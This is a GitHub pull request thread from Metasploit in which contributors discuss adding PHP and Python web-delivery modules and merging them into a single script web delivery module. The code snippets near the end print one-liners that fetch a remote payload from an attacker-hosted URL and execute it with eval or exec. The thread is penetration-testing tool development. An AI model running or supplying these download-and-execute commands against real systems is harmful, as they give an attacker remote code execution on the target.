Addition of php web delivery and python web delivery #3018

Closed
wants to merge 11 commits into
from

Conversation

Projects
None yet
6 participants
Contributor

jakxx commented Feb 21, 2014

Modules stands up web server and serves payload much like psh_web_delivery. This PR adds support for both PHP and python.

Contributor

jakxx commented Feb 21, 2014

Not sure what to do about disclosure date in this case. First PR to msf so go easy on me :)

Contributor

zeroSteiner commented Feb 21, 2014

@Meatballs1 Do you think it would be beneficial to combine these with your psh_web_delivery module into one like multi/misc/script_web_delivery? It looks like it could be accomplished by adding additional targets.

Contributor

jakxx commented Feb 21, 2014

Yea I thought about that as well. Didnt know if it would be better to keep them separate or try combining them.

Contributor

Meatballs1 commented Feb 21, 2014

@nullbind has done something similar. But i was thinking that maybe payloads should contain the logic for downoad+eval similar to your arch_cmd changes @zeroSteiner. Potentially they could do some kind of arch_cmd_web?? Or maybe this should be implemented as a stager for each respective arch?

Powershell is currently a special case as it is more like an encoder than a payload (we choose a native payload). But it hasnt been formalised as either of these yet.

Its definitely useful to have a handy delivery mechanism like this just need some thought about how best we can implement it to make it flexible. I was suprised how much and how differently the psh_web_delivery could be used but also want to be able to slot that style into psh cmd exploits where space is limited or badchars mean ithas to be b64 enc etc.

Contributor

jakxx commented Feb 24, 2014

@Meatballs1 I like the idea of integrating it into payloads. At the same time, the current architecture just makes it so flexible. Excellent for scenarios where MSF was not used to gain initial command exec.

Contributor

wchen-r7 commented Feb 25, 2014

IMO they look like payloads+handlers. I'm not sure if they should be considered as exploits.

Contributor

jakxx commented Feb 26, 2014

I am good with however you guys want to implement them. Just let me know what I need to do.

Contributor

jakxx commented May 15, 2014

@wchen-r7 @Meatballs1 Any more thoughts on this?? I am kinda leaning towards @zeroSteiner 's idea of a mult/misc/script_web_delivery

Contributor

Meatballs1 commented May 15, 2014

Here is @nullbind's example: https://github.com/pwnwiki/q/blob/master/modules/exploits/netspi/ps_webshells.rb
Which is along the lines of a script_web_delivery.

I think people would find it useful, I'm surprised at the number of ways people have used psh_web_delivery

Contributor

jakxx commented May 29, 2014

@Meatballs1 Awesome. I am close to having a new PR ready. Should I incorporate the powershell option or leave that as a stand alone module?

Contributor

Meatballs1 commented May 29, 2014

I don't see a reason to keep it standalone if it reduces the amount of duplicate code

@todb-r7 todb-r7 added the module label May 30, 2014

@jakxx jakxx referenced this pull request Jun 4, 2014

Merged

Script web delivery #3419

Contributor

jakxx commented Jun 20, 2014

Closing for updated PR #3419

@jakxx jakxx closed this Jun 20, 2014

+ url = get_uri()
+ print_status("Run the following command on the target machine:")
+ print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"")
+ print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"")
@mwulftange

mwulftange Jun 21, 2014

Contributor

Generally, you don’t need .exe when calling a proper executable in Windows shell. So the first would suffice for both systems.

+ url = get_uri()
+ print_status("Run the following command on the target machine:")
+ print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
+ print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
@mwulftange

mwulftange Jun 21, 2014

Contributor

Same as above.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment